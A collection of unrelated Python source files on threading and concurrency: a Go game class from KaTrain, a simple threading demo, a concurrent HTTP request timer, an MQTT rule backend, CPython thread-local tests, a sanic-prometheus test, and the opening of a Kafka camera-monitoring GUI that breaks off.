analyze_fast=False,
game_properties: Optional[Dict] = None,
sgf_filename=None,
):
self.katrain = katrain
self._lock = threading.Lock()
if not isinstance(engine, Dict):
engine = {"B": engine, "W": engine}
self.engines = engine
self.game_id = datetime.strftime(datetime.now(), "%Y-%m-%d %H %M %S")
self.sgf_filename = sgf_filename
self.insert_mode = False
self.insert_after = None
self.region_of_interest = None
self.external_game = False # not generated by katrain at some point
if move_tree:
self.root = move_tree
self.external_game = PROGRAM_NAME not in self.root.get_property("AP", "")
self.komi = self.root.komi
handicap = int(self.root.handicap)
num_starting_moves_black = 0
node = self.root
while node.children:
node = node.children[0]
if node.player == "B":
num_starting_moves_black += 1
else:
break
if (
handicap >= 2
and not self.root.placements
and not (num_starting_moves_black == handicap)
and not (self.root.children and self.root.children[0].placements)
): # not really according to sgf, and not sure if still needed, last clause for fox
self.root.place_handicap_stones(handicap)
else:
board_size = katrain.config("game/size")
rules = katrain.config("game/rules")
self.komi = katrain.config("game/komi")
self.root = GameNode(
properties={
**Game.DEFAULT_PROPERTIES,
**{"SZ": board_size, "KM": self.komi, "DT": self.game_id, "RU": rules},
**(game_properties or {}),
}
)
handicap = katrain.config("game/handicap")
if handicap:
self.root.place_handicap_stones(handicap)
if not self.root.get_property("RU"):
self.root.set_property("RU", katrain.config("game/rules"))
self.set_current_node(self.root)
self.main_time_used = 0
# restore shortcuts
shortcut_id_to_node = {node.get_property("KTSID", None): node for node in self.root.nodes_in_tree}
for node in self.root.nodes_in_tree:
shortcut_id = node.get_property("KTSF", None)
if shortcut_id and shortcut_id in shortcut_id_to_node:
shortcut_id_to_node[shortcut_id].add_shortcut(node)
threading.Thread(
target=lambda: self.analyze_all_nodes(-1_000_000, analyze_fast=analyze_fast, even_if_present=False),
daemon=True,
).start() # return faster, but bypass Kivy Clock
def analyze_all_nodes(self, priority=0, analyze_fast=False, even_if_present=True):
for node in self.root.nodes_in_tree:
# forced, or not present, or something went wrong in loading
if even_if_present or not node.analysis_from_sgf or not node.load_analysis():
node.clear_analysis()
node.analyze(self.engines[node.next_player], priority=priority, analyze_fast=analyze_fast)
# -- move tree functions --
def _calculate_groups(self):
board_size_x, board_size_y = self.board_size
with self._lock:
self.board = [
[-1 for _x in range(board_size_x)] for _y in range(board_size_y)
] # type: List[List[int]] # board pos -> chain id
self.chains = [] # type: List[List[Move]] # chain id -> chain
self.prisoners = [] # type: List[Move]
self.last_capture = [] # type: List[Move]
try:
for node in self.current_node.nodes_from_root:
for m in node.move_with_placements:
self._validate_move_and_update_chains(
m, True
) # ignore ko since we didn't know if it was forced
except IllegalMoveException as e:
raise Exception(f"Unexpected illegal move ({str(e)})")
def _validate_move_and_update_chains(self, move: Move, ignore_ko: bool):
board_size_x, board_size_y = self.board_size
def neighbours(moves):
return {
self.board[m.coords[1] + dy][m.coords[0] + dx]
for m in moves
for dy, dx in [(-1, 0), (1, 0), (0, -1), (0, 1)]
if 0 <= m.coords[0] + dx < board_size_x and 0 <= m.coords[1] + dy < board_size_y
}
ko_or_snapback = len(self.last_capture) == 1 and self.last_capture[0] == move
self.last_capture = []
if move.is_pass:
return
if self.board[move.coords[1]][move.coords[0]] != -1:
raise IllegalMoveException("Space occupied")
nb_chains = list({c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player == move.player})
if nb_chains:
this_chain = nb_chains[0]
self.board = [
[nb_chains[0] if sq in nb_chains else sq for sq in line] for line in self.board
] # merge chains connected by this move
for oc in nb_chains[1:]:
self.chains[nb_chains[0]] += self.chains[oc]
self.chains[oc] = []
self.chains[nb_chains[0]].append(move)
else:
this_chain = len(self.chains)
self.chains.append([move])
self.board[move.coords[1]][move.coords[0]] = this_chain
opp_nb_chains = {c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player != move.player}
for c in opp_nb_chains:
if -1 not in neighbours(self.chains[c]):
self.last_capture += self.chains[c]
for om in self.chains[c]:
self.board[om.coords[1]][om.coords[0]] = -1
self.chains[c] = []
if ko_or_snapback and len(self.last_capture) == 1 and not ignore_ko:
raise IllegalMoveException("Ko")
self.prisoners += self.last_capture
if -1 not in neighbours(self.chains[this_chain]): # TODO: NZ rules?
raise IllegalMoveException("Suicide")
def set_insert_mode(self, mode):
if mode == "toggle":
mode = not self.insert_mode
if mode == self.insert_mode:
return
self.insert_mode = mode
if mode:
children = self.current_node.ordered_children
if not children:
self.insert_mode = False
else:
self.insert_after = self.current_node.ordered_children[0]
self.katrain.controls.set_status(i18n._("starting insert mode"), STATUS_INFO)
else:
copy_from_node = self.insert_after
copy_to_node = self.current_node
num_copied = 0
if copy_to_node != self.insert_after.parent:
above_insertion_root = self.insert_after.parent.nodes_from_root
already_inserted_moves = [
n.move for n in copy_to_node.nodes_from_root if n not in above_insertion_root and n.move
]
try:
while True:
if copy_from_node.move not in already_inserted_moves:
for m in copy_from_node.move_with_placements:
self._validate_move_and_update_chains(m, True)
# this inserts
copy_to_node = GameNode(
parent=copy_to_node, properties=copy.deepcopy(copy_from_node.properties)
)
num_copied += 1
if not copy_from_node.children:
break
copy_from_node = copy_from_node.ordered_children[0]
except IllegalMoveException:
pass # illegal move = stop
self._calculate_groups() # recalculate groups
self.katrain.controls.set_status(
i18n._("ending insert mode").format(num_copied=num_copied), STATUS_INFO
)
self.analyze_all_nodes(analyze_fast=True, even_if_present=False)
else:
self.katrain.controls.set_status("", STATUS_INFO)
self.katrain.controls.move_tree.insert_node = self.insert_after if self.insert_mode else None
self.katrain.controls.move_tree.redraw()
self.katrain.update_state(redraw_board=True)
# Play a Move from the current position, raise IllegalMoveException if invalid.
def play(self, move: Move, ignore_ko: bool = False, analyze=True):
board_size_x, board_size_y = self.board_size
if not move.is_pass and not (0 <= move.coords[0] < board_size_x and 0 <= move.coords[1] < board_size_y):
raise IllegalMoveException(f"Move {move} outside of board coordinates")
try:
self._validate_move_and_update_chains(move, ignore_ko)
except IllegalMoveException:
self._calculate_groups()
raise
with self._lock:
played_node = self.current_node.play(move)
self.current_node = played_node
if analyze:
if self.region_of_interest:
played_node.analyze(self.engines[played_node.next_player], analyze_fast=True)
played_node.analyze(self.engines[played_node.next_player], region_of_interest=self.region_of_interest)
else:
played_node.analyze(self.engines[played_node.next_player])
return played_node
def set_current_node(self, node):
if self.insert_mode:
self.katrain.controls.set_status(i18n._("finish inserting before navigating"), STATUS_ERROR)
return
self.current_node = node
self._calculate_groups()
def undo(self, n_times=1, stop_on_mistake=None):
# allow undo/delete only in insert mode
cn = self.current_node # avoid race conditions
if self.insert_mode: # in insert mode, undo = delete
if n_times == 1 and cn not in self.insert_after.nodes_from_root:
cn.parent.children = [c for c in cn.parent.children if c != cn]
self.current_node = cn.parent
self._calculate_groups()
return
break_on_branch = False
break_on_main_branch = False
last_branching_node = cn
if n_times == "branch":
n_times = 9999
break_on_branch = True
elif n_times == "main-branch":
n_times = 9999
break_on_main_branch = True
for move in range(n_times):
if (
stop_on_mistake is not None
and cn.points_lost is not None
and cn.points_lost >= stop_on_mistake
and self.katrain.players_info[cn.player].player_type != PLAYER_AI
):
self.set_current_node(cn.parent)
return
previous_cn = cn
if cn.shortcut_from:
cn = cn.shortcut_from
elif not cn.is_root:
cn = cn.parent
else:
break # root
if break_on_branch and len(cn.children) > 1:
break
elif break_on_main_branch and cn.ordered_children[0] != previous_cn: # implies > 1 child
last_branching_node = cn
if break_on_main_branch:
cn = last_branching_node
if cn is not self.current_node:
self.set_current_node(cn)
def redo(self, n_times=1, stop_on_mistake=None):
if self.insert_mode:
return
cn = self.current_node # avoid race conditions
for move in range(n_times):
if cn.children:
child = cn.ordered_children[0]
shortcut_to = [m for m, v in cn.shortcuts_to if child == v] # are we about to go to a shortcut node?
if shortcut_to:
child = shortcut_to[0]
cn = child
if (
move > 0
and stop_on_mistake is not None
and cn.points_lost is not None
and cn.points_lost >= stop_on_mistake
and self.katrain.players_info[cn.player].player_type != PLAYER_AI
):
self.set_current_node(cn.parent)
return
if stop_on_mistake is None:
self.set_current_node(cn)
def cycle_children(self, direction):
cn = self.current_node # avoid race conditions
if cn.parent and len(cn.parent.children) > 1:
ordered_children = cn.parent.ordered_children
ix = (ordered_children.index(cn) + len(ordered_children) + direction) % len(ordered_children)
self.set_current_node(ordered_children[ix])
@property
def board_size(self):
return self.root.board_size
@property
def stones(self):
with self._lock:
return sum(self.chains, [])
@property
def end_result(self):
if self.current_node.end_state:
return self.current_node.end_state
if self.current_node.parent and self.current_node.is_pass and self.current_node.parent.is_pass:
return self.manual_score or i18n._("board-game-end")
@property
def prisoner_count(
self,
) -> Dict: # returns prisoners that are of a certain colour as {B: black stones captures, W: white stones captures}
return {player: sum([m.player == player for m in self.prisoners]) for player in Move.PLAYERS}
@property
def manual_score(self):
rules = self.engines["B"].get_rules(self.root)
if not self.current_node.ownership or rules != "japanese":
if not self.current_node.score:
return None
self.katrain.log(
f"rules '{rules}' are not japanese, or no ownership available ({not self.current_node.ownership}) -> no manual score available",
OUTPUT_DEBUG,
)
return self.current_node.format_score(round(2 * self.current_node.score) / 2) + "?"
board_size_x, board_size_y = self.board_size
ownership_grid = var_to_grid(self.current_node.ownership, (board_size_x, board_size_y))
stones = {m.coords: m.player for m in self.stones}
lo_threshold = 0.15
hi_threshold = 0.85
max_unknown = 10
max_dame = 4 * (board_size_x + board_size_y)
def japanese_score_square(square, owner):
player = stones.get(square, None)
if (
(player == "B" and owner > hi_threshold)
or (player == "W" and owner < -hi_threshold)
or abs(owner) < lo_threshold
):
return 0 # dame or own stones
if player is None and abs(owner) >= hi_threshold:
return round(owner) # surrounded empty intersection
if (player == "B" and owner < -hi_threshold) or (player == "W" and owner > hi_threshold):
return 2 * round(owner) # captured stone
return math.nan # unknown!
scored_squares = [
japanese_score_square((x, y), ownership_grid[y][x])
for y in range(board_size_y)
for x in range(board_size_x)
]
num_sq = {t: sum([s == t for s in scored_squares]) for t in [-2, -1, 0, 1, 2]}
num_unkn = sum(math.isnan(s) for s in scored_squares)
prisoners = self.prisoner_count
score = sum([t * n for t, n in num_sq.items()]) + prisoners["W"] - prisoners["B"] - self.komi
self.katrain.log(
f"Manual Scoring: {num_sq} score by square with {num_unkn} unknown, {prisoners} captures, and {self.komi} komi -> score = {score}",
OUTPUT_DEBUG,
)
if num_unkn > max_unknown or (num_sq[0] - len(stones)) > max_dame:
return None
return self.current_node.format_score(score)
def __repr__(self):
return (
"\n".join("".join(self.chains[c][0].player if c >= 0 else "-" for c in line) for line in self.board)
+ f"\ncaptures: {self.prisoner_count}"
)
def update_root_properties(self):
def player_name(player_info):
if player_info.name and player_info.player_type == PLAYER_HUMAN:
return player_info.name
else:
return f"{i18n._(player_info.player_type)} ({i18n._(player_info.player_subtype)})"
root_properties = self.root.properties
x_properties = {}
for bw in "BW":
if not self.external_game:
x_properties["P" + bw] = player_name(self.katrain.players_info[bw]) + SGF_INTERNAL_COMMENTS_MARKER
player_info = self.katrain.players_info[bw]
if player_info.player_type == PLAYER_AI:
x_properties[bw + "R"] = rank_label(player_info.calculated_rank)
if "+" in str(self.end_result):
x_properties["RE"] = self.end_result
self.root.properties = {**root_properties, **{k: [v] for k, v in x_properties.items()}}
def generate_filename(self):
self.update_root_properties()
player_names = {
bw: re.sub(r"[\u200b\u3164'<>:\"/\\|?*]", "", self.root.get_property("P" + bw, bw)) for bw in "BW"
}
base_game_name = f"{PROGRAM_NAME}_{player_names['B']} vs {player_names['W']}"
return f"{base_game_name} {self.game_id}.sgf"
def write_sgf(self, filename: str, trainer_config: Optional[Dict] = None):
if trainer_config is None:
trainer_config = self.katrain.config("trainer", {})
save_feedback = trainer_config.get("save_feedback", False)
eval_thresholds = trainer_config["eval_thresholds"]
save_analysis = trainer_config.get("save_analysis", False)
self.update_root_properties()
show_dots_for = {
bw: trainer_config.get("eval_show_ai", True) or self.katrain.players_info[bw].human for bw in "BW"
}
sgf = self.root.sgf(
save_comments_player=show_dots_for,
save_comments_class=save_feedback,
eval_thresholds=eval_thresholds,
save_analysis=save_analysis,
)
self.sgf_filename = filename
os.makedirs(os.path.dirname(filename), exist_ok=True)
with open(filename, "w", encoding="utf-8") as f:
f.write(sgf)
return i18n._("sgf written").format(file_name=filename)
def set_region_of_interest(self, region_of_interest):
x1, x2, y1, y2 = region_of_interest
xmin, xmax = min(x1, x2), max(x1, x2)
ymin, ymax = min(y1, y2), max(y1, y2)
szx, szy = self.board_size
if not (xmin == xmax and ymin == ymax) and not (xmax - xmin + 1 >= szx and ymax - ymin + 1 >= szy):
self.region_of_interest = [xmin, xmax, ymin, ymax]
else:
self.region_of_interest = None
self.katrain.controls.set_status("", OUTPUT_INFO)
def analyze_extra(self, mode, **kwargs):
stones = {s.coords for s in self.stones}
cn = self.current_node
engine = self.engines[cn.next_player]
Clock.schedule_once(self.katrain.analysis_controls.hints.activate, 0)
if mode == "extra":
if kwargs.get("continuous", False):
visits = min(
1_000_000_000, max(engine.config["max_visits"], math.ceil(cn.analysis_visits_requested * 1.25))
)
else:
visits = cn.analysis_visits_requested + engine.config["max_visits"]
self.katrain.controls.set_status(i18n._("extra analysis").format(visits=visits), STATUS_ANALYSIS)
self.katrain.controls.set_status(i18n._("extra analysis").format(visits=visits), STATUS_ANALYSIS)
cn.analyze(
engine, visits=visits, priority=-1_000, region_of_interest=self.region_of_interest, time_limit=False
)
return
if mode == "game":
nodes = self.root.nodes_in_tree
if "visits" in kwargs:
visits = kwargs["visits"]
else:
min_visits = min(node.analysis_visits_requested for node in nodes)
visits = min_visits + engine.config["max_visits"]
for node in nodes:
node.analyze(engine, visits=visits, priority=-1_000_000, time_limit=False, report_every=None)
self.katrain.controls.set_status(i18n._("game re-analysis").format(visits=visits), STATUS_ANALYSIS)
return
elif mode == "sweep":
board_size_x, board_size_y = self.board_size
if cn.analysis_exists:
policy_grid = (
var_to_grid(self.current_node.policy, size=(board_size_x, board_size_y))
if self.current_node.policy
else None
)
analyze_moves = sorted(
[
Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (policy_grid is None and (x, y) not in stones) or policy_grid[y][x] >= 0
],
key=lambda mv: -policy_grid[mv.coords[1]][mv.coords[0]],
)
else:
analyze_moves = [
Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (x, y) not in stones
]
visits = engine.config["fast_visits"]
self.katrain.controls.set_status(i18n._("sweep analysis").format(visits=visits), STATUS_ANALYSIS)
priority = -1_000_000_000
elif mode in ["equalize", "alternative", "local"]:
if not cn.analysis_complete and mode != "local":
self.katrain.controls.set_status(i18n._("wait-before-extra-analysis"), STATUS_INFO, self.current_node)
return
if mode == "alternative": # also do a quick update on current candidates so it doesn't look too weird
self.katrain.controls.set_status(i18n._("alternative analysis"), STATUS_ANALYSIS)
cn.analyze(engine, priority=-500, time_limit=False, find_alternatives="alternative")
visits = engine.config["fast_visits"]
else: # equalize
visits = max(d["visits"] for d in cn.analysis["moves"].values())
self.katrain.controls.set_status(i18n._("equalizing analysis").format(visits=visits), STATUS_ANALYSIS)
priority = -1_000
analyze_moves = [Move.from_gtp(gtp, player=cn.next_player) for gtp, _ in cn.analysis["moves"].items()]
else:
raise ValueError("Invalid analysis mode")
for move in analyze_moves:
if cn.analysis["moves"].get(move.gtp(), {"visits": 0})["visits"] < visits:
cn.analyze(
engine, priority=priority, visits=visits, refine_move=move, time_limit=False
) # explicitly requested so take as long as you need
def play_to_end(self):
cn = self.current_node
count = 0
if not cn.analysis_exists:
self.katrain.controls.set_status(i18n._("wait-before-extra-analysis"), STATUS_INFO, cn)
return
def analyze_and_play_policy(node):
nonlocal count, cn
cand = node.candidate_moves
if self.katrain.game is not self:
return # a new game happened
if cand:
move = Move.from_gtp(cand[0]["move"], player=node.next_player)
else:
polmoves = node.policy_ranking
move = polmoves[0][1] if polmoves else Move(None)
if move.is_pass:
if self.current_node == cn:
self.set_current_node(node)
return
count += 1
new_node = GameNode(parent=node, move=move)
if node != cn:
node.remove_shortcut()
cn.add_shortcut(new_node)
self.katrain.controls.move_tree.redraw_tree_trigger()
def set_analysis(result, _partial):
new_node.set_analysis(result)
analyze_and_play_policy(new_node)
self.engines[node.next_player].request_analysis(
new_node, callback=set_analysis, priority=-1000, analyze_fast=True
)
analyze_and_play_policy(cn)
def analyze_undo(self, node):
train_config = self.katrain.config("trainer")
move = node.move
if node != self.current_node or node.auto_undo is not None or not node.analysis_complete or not move:
return
points_lost = node.points_lost
thresholds = train_config["eval_thresholds"]
num_undo_prompts = train_config["num_undo_prompts"]
i = 0
while i < len(thresholds) and points_lost < thresholds[i]:
i += 1
num_undos = num_undo_prompts[i] if i < len(num_undo_prompts) else 0
if num_undos == 0:
undo = False
elif num_undos < 1: # probability
undo = int(node.undo_threshold < num_undos) and len(node.parent.children) == 1
else:
undo = len(node.parent.children) <= num_undos
node.auto_undo = undo
if undo:
self.undo(1)
self.katrain.controls.set_status(
i18n._("teaching undo message").format(move=move.gtp(), points_lost=points_lost), STATUS_TEACHING
)
self.katrain.update_state()
|
threading_accept_die.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 17 13:07:14 2018
@author: tensorflow-cuda
"""
import threading
def print_cube(num):
"""
function to print cube of given num
"""
print("Cube: {}".format(num * num * num))
def print_square(num):
"""
function to print square of given num
"""
print("Square: {}".format(num * num))
if __name__ == "__main__":
# creating thread
t1 = threading.Thread(target=print_square, args=(10,))
t2 = threading.Thread(target=print_cube, args=(10,))
# starting thread 1
t1.start()
# starting thread 2
t2.start()
# wait until thread 1 is completely executed
t1.join()
# wait until thread 2 is completely executed
t2.join()
# both threads completely executed
print("Done!")
|
request_example.py
|
import multiprocessing
import requests
import sys
import threading
from timeit import Timer
import warnings
def request_item(item_id):
print("Thread {} starts ...".format(threading.currentThread().getName()))
try:
r = requests.get("http://hn.algolia.com/api/v1/items/{}".format(item_id))
except requests.RequestException as e:
warnings.warn(f"Request for {item_id} failed\n{e.message}")
#warnings.warn("Request for {item_id} failed\n{message}".format(item_id=item_id, message=e.message))
return None
print("Thread {} is completed.".format(threading.currentThread().getName()))
return r.json()
def request_sequential(id_min=1, id_max=21):
sys.stdout.write("Requesting sequentially...\n")
# get the metadata of all posts with an item_id ranging from 1 to 20
for item_id in range(id_min, id_max):
request_item(item_id)
sys.stdout.write("done.\n")
def request_concurrent(id_min=1, id_max=21):
sys.stdout.write("Requesting in parallel...\n")
jobs = []
for i in range(id_min, id_max):
thread = threading.Thread(name=i, target=request_item, args=(i, ))
jobs.append(thread)
thread.start()
print("Waiting for threads to finish execution.")
for j in jobs:
j.join()
sys.stdout.write("done.\n")
if __name__ == '__main__':
t = Timer(lambda: request_sequential())
print("Completed sequential in {} seconds.".format(t.timeit(1)))
print("--------------------------------------")
t = Timer(lambda: request_concurrent())
print("Completed using threads in {} seconds.".format(t.timeit(1)))
|
ruleBackend.py
|
import time
import paho.mqtt.client as mqtt
import signal
import sys
import threading
topics=[]
publisher=None
subscriber=None
connected=None
def disconnecthandler(mqc,userdata,rc):
print("Disconnected from broker")
global connected
connected = False
def init(host,port,user=None,password=None):
global publisher
publisher = Publisher(host,port,user,password)
global subscriber
subscriber = Subscriber(host,port,user,password)
def start():
subscriber.connect()
class Subscriber:
def __init__(self,host,port,user,pw):
self.clientid=None
self.mqc=None
self.host=host
self.port=port
self.user=user
self.pw=pw
self.topics=[]
self.handlers=[]
self.clientid="mqttRuleBackend-subscriber-"+ str(time.time())
def addTopic(self,topic,handler):
self.topics.append((topic,1))
self.handlers.append((topic,handler))
def connect(self):
self.mqc=mqtt.Client(client_id=self.clientid)
if self.user is not None and self.pw is not None:
self.mqc.username_pw_set(self.user,self.pw)
self.mqc.on_connect=self.connecthandler
self.mqc.on_disconnect=disconnecthandler
self.mqc.on_message=self.messagehandler
self.mqc.on_log=self.on_log
self.mqc.disconnected = True
self.mqc.connect(self.host,self.port,60)
self.mqc.loop_start()
global connected
connected = True
print("New client: "+self.clientid)
def messagehandler(self,mqc,userdata,msg):
payload=str(msg.payload.decode("utf-8"))
topic=str(msg.topic)
for t in self.handlers:
if t[0] == topic:
t[1](topic,payload)
def connecthandler(self,mqc,userdata,flags,rc):
self.mqc.subscribe(self.topics)
print("Subscribing to: "+str(self.topics))
def on_log(client, userdata, level, buff):
print("log: ",buff)
class Publisher:
def __init__(self,host,port,user,pw):
self.host=host
self.port=port
self.user=user
self.pw=pw
self.clientid="mqttRuleBackend-publisher-"+ str(time.time())
print("New client: "+self.clientid)
self.mqc=mqtt.Client(client_id=self.clientid)
if self.user is not None and self.pw is not None:
self.mqc.username_pw_set(self.user,self.pw)
self.mqc.on_log=self.on_log
self.mqc.disconnected = True
self.mqc.on_disconnect=disconnecthandler
self.mqc.connect(self.host,self.port,60)
self.mqc.loop_start()
def on_log(client, userdata, level, buff):
print("log: ",buff)
def send(self,topic,payload):
self.mqc.publish(topic,payload,qos=1,retain=False)
class Topic:
def __init__(self,rule,topic,react_on):
self.topic=topic
self.react_on=react_on
self.oldPayload=None
self.rule=rule
subscriber.addTopic(self.topic,self.messagehandler)
def messagehandler(self,topic,payload):
if self.react_on == "on_message":
self.executeRule(payload,topic)
else:
if self.react_on.startswith("on_payload:"):
stripped=self.react_on.lstrip("on_payload:")
if payload == stripped:
self.executeRule(payload,topic)
else:
if self.react_on == "on_change":
if self.oldPayload is not None:
if self.oldPayload != payload:
self.executeRule(payload,topic)
self.oldPayload=payload
else:
self.oldPayload=payload
def executeRule(self,payload,topic):
try:
sbl=threading.Thread(target=self.rule,args=(payload,topic))
sbl.daemon = True
sbl.start()
except Exception as e:
print("Error when executing rule: "+str(e))
class State:
def __init__(self,topic):
self.topic=topic
self.state=""
subscriber.addTopic(self.topic,self.messagehandler)
def messagehandler(self,topic,payload):
self.state=payload
def on_log(client, userdata, level, buff):
print("log: ",buff)
def signal_handler(signal, frame):
print('Exiting ' + sys.argv[0])
global connected
connected = False
signal.signal(signal.SIGINT, signal_handler)
|
test_threading_local.py
|
import sys
import unittest
from doctest import DocTestSuite
from test import support
from test.support import threading_helper
import weakref
import gc
# Modules under test
import _thread
import threading
import _threading_local
class Weak(object):
pass
def target(local, weaklist):
weak = Weak()
local.weak = weak
weaklist.append(weakref.ref(weak))
class BaseLocalTest:
def test_local_refs(self):
self._local_refs(20)
self._local_refs(50)
self._local_refs(100)
def _local_refs(self, n):
local = self._local()
weaklist = []
for i in range(n):
t = threading.Thread(target=target, args=(local, weaklist))
t.start()
t.join()
del t
gc.collect()
self.assertEqual(len(weaklist), n)
# XXX _threading_local keeps the local of the last stopped thread alive.
deadlist = [weak for weak in weaklist if weak() is None]
self.assertIn(len(deadlist), (n-1, n))
# Assignment to the same thread local frees it sometimes (!)
local.someothervar = None
gc.collect()
deadlist = [weak for weak in weaklist if weak() is None]
self.assertIn(len(deadlist), (n-1, n), (n, len(deadlist)))
def test_derived(self):
# Issue 3088: if there is a threads switch inside the __init__
# of a threading.local derived class, the per-thread dictionary
# is created but not correctly set on the object.
# The first member set may be bogus.
import time
class Local(self._local):
def __init__(self):
time.sleep(0.01)
local = Local()
def f(i):
local.x = i
# Simply check that the variable is correctly set
self.assertEqual(local.x, i)
with threading_helper.start_threads(threading.Thread(target=f, args=(i,))
for i in range(10)):
pass
def test_derived_cycle_dealloc(self):
# http://bugs.python.org/issue6990
class Local(self._local):
pass
locals = None
passed = False
e1 = threading.Event()
e2 = threading.Event()
def f():
nonlocal passed
# 1) Involve Local in a cycle
cycle = [Local()]
cycle.append(cycle)
cycle[0].foo = 'bar'
# 2) GC the cycle (triggers threadmodule.c::local_clear
# before local_dealloc)
del cycle
gc.collect()
e1.set()
e2.wait()
# 4) New Locals should be empty
passed = all(not hasattr(local, 'foo') for local in locals)
t = threading.Thread(target=f)
t.start()
e1.wait()
# 3) New Locals should recycle the original's address. Creating
# them in the thread overwrites the thread state and avoids the
# bug
locals = [Local() for i in range(10)]
e2.set()
t.join()
self.assertTrue(passed)
def test_arguments(self):
# Issue 1522237
class MyLocal(self._local):
def __init__(self, *args, **kwargs):
pass
MyLocal(a=1)
MyLocal(1)
self.assertRaises(TypeError, self._local, a=1)
self.assertRaises(TypeError, self._local, 1)
def _test_one_class(self, c):
self._failed = "No error message set or cleared."
obj = c()
e1 = threading.Event()
e2 = threading.Event()
def f1():
obj.x = 'foo'
obj.y = 'bar'
del obj.y
e1.set()
e2.wait()
def f2():
try:
foo = obj.x
except AttributeError:
# This is expected -- we haven't set obj.x in this thread yet!
self._failed = "" # passed
else:
self._failed = ('Incorrectly got value %r from class %r\n' %
(foo, c))
sys.stderr.write(self._failed)
t1 = threading.Thread(target=f1)
t1.start()
e1.wait()
t2 = threading.Thread(target=f2)
t2.start()
t2.join()
# The test is done; just let t1 know it can exit, and wait for it.
e2.set()
t1.join()
self.assertFalse(self._failed, self._failed)
def test_threading_local(self):
self._test_one_class(self._local)
def test_threading_local_subclass(self):
class LocalSubclass(self._local):
"""To test that subclasses behave properly."""
self._test_one_class(LocalSubclass)
def _test_dict_attribute(self, cls):
obj = cls()
obj.x = 5
self.assertEqual(obj.__dict__, {'x': 5})
with self.assertRaises(AttributeError):
obj.__dict__ = {}
with self.assertRaises(AttributeError):
del obj.__dict__
def test_dict_attribute(self):
self._test_dict_attribute(self._local)
def test_dict_attribute_subclass(self):
class LocalSubclass(self._local):
"""To test that subclasses behave properly."""
self._test_dict_attribute(LocalSubclass)
def test_cycle_collection(self):
class X:
pass
x = X()
x.local = self._local()
x.local.x = x
wr = weakref.ref(x)
del x
gc.collect()
self.assertIsNone(wr())
class ThreadLocalTest(unittest.TestCase, BaseLocalTest):
_local = _thread._local
class PyThreadingLocalTest(unittest.TestCase, BaseLocalTest):
_local = _threading_local.local
def test_main():
suite = unittest.TestSuite()
suite.addTest(DocTestSuite('_threading_local'))
suite.addTest(unittest.makeSuite(ThreadLocalTest))
suite.addTest(unittest.makeSuite(PyThreadingLocalTest))
local_orig = _threading_local.local
def setUp(test):
_threading_local.local = _thread._local
def tearDown(test):
_threading_local.local = local_orig
suite.addTest(DocTestSuite('_threading_local',
setUp=setUp, tearDown=tearDown)
)
support.run_unittest(suite)
if __name__ == '__main__':
test_main()
|
it_multiprocess.py
|
import re
import unittest
from time import sleep
from multiprocessing import Process
from urllib import request
from sanic import Sanic
from sanic.response import json
from sanic_prometheus import monitor, SanicPrometheusError
TEST_PORT = 54424
def launch_server():
app = Sanic('test_mp')
@app.route('/test')
async def test(request):
return json({'a': 'b'})
monitor(app).expose_endpoint()
app.run(port=TEST_PORT, workers=2)
class TestMultiprocessing(unittest.TestCase):
def setUp(self):
self._procs = []
def tearDown(self):
for p in self._procs:
p.terminate()
def test_start_server_should_not_work_with_mp(self):
app = Sanic('test_mp')
self.assertRaises(SanicPrometheusError, monitor(app).start_server)
def test_metrics_are_aggregated_between_workers(self):
p = Process(target=launch_server)
self._procs.append(p)
p.start()
sleep(1)
for _ in range(100):
r = request.urlopen("http://localhost:{}/test".format(TEST_PORT))
_ = r.read()
r = request.urlopen("http://localhost:{}/metrics".format(TEST_PORT))
nreqs = None
for l in r.readlines():
l = l.decode('ascii')
m = re.match(r"^sanic_request_count_total\{.+\}\s+(\d+)\s*", l)
if m:
nreqs = int(m.group(1))
break
self.assertIsNotNone(nreqs)
self.assertEqual(nreqs, 100)
|
monitoring_app_external_broker.py
|
import time
import wx
import cStringIO
from kafka import KafkaConsumer
import threading
import Queue
from datetime import datetime
#import simplejson
import pickle
local_consumer1 = KafkaConsumer('PhayaThai-1', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view1', consumer_timeout_ms = 300)
local_consumer2 = KafkaConsumer('PhayaThai-2', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view2', consumer_timeout_ms = 300)
local_consumer3 = KafkaConsumer('PhayaThai-3', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view3', consumer_timeout_ms = 300)
local_consumer4 = KafkaConsumer('PhayaThai-4', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view4', consumer_timeout_ms = 300)
local_consumer5 = KafkaConsumer('PhayaThai-5', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view5', consumer_timeout_ms = 300)
local_consumer6 = KafkaConsumer('PhayaThai-6', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view6', consumer_timeout_ms = 300)
local_consumer1.poll()
local_consumer2.poll()
local_consumer3.poll()
local_consumer4.poll()
local_consumer5.poll()
local_consumer6.poll()
local_consumer1.seek_to_end()
local_consumer2.seek_to_end()
local_consumer3.seek_to_end()
local_consumer4.seek_to_end()
local_consumer5.seek_to_end()
local_consumer6.seek_to_end()
my_queue1 = Queue.Queue()
my_queue2 = Queue.Queue()
my_queue3 = Queue.Queue()
my_queue4 = Queue.Queue()
my_queue5 = Queue.Queue()
my_queue6 = Queue.Queue()
start = time.time()
period_of_time = 120
latency_list_of_pi1 = []
latency_list_of_pi2 = []
latency_list_of_pi3 = []
latency_list_of_pi4 = []
latency_list_of_pi5 = []
latency_list_of_pi6 = []
unix_timestamp_of_pi1 = []
unix_timestamp_of_pi2 = []
unix_timestamp_of_pi3 = []
unix_timestamp_of_pi4 = []
unix_timestamp_of_pi5 = []
unix_timestamp_of_pi6 = []
image_list_pi1 = []
image_list_pi2 = []
image_list_pi3 = []
image_list_pi4 = []
image_list_pi5 = []
image_list_pi6 = []
class MyPanel(wx.Panel):
""""""
#----------------------------------------------------------------------
def __init__(self, parent):
wx.Panel.__init__(self, parent)
background_image = 'new_one_1920_1080.png'
bmp_background = wx.Image(background_image, wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.bitmap1 = wx.StaticBitmap(self, -1, bmp_background, (0, 0))
parent.SetTitle('consumer application')
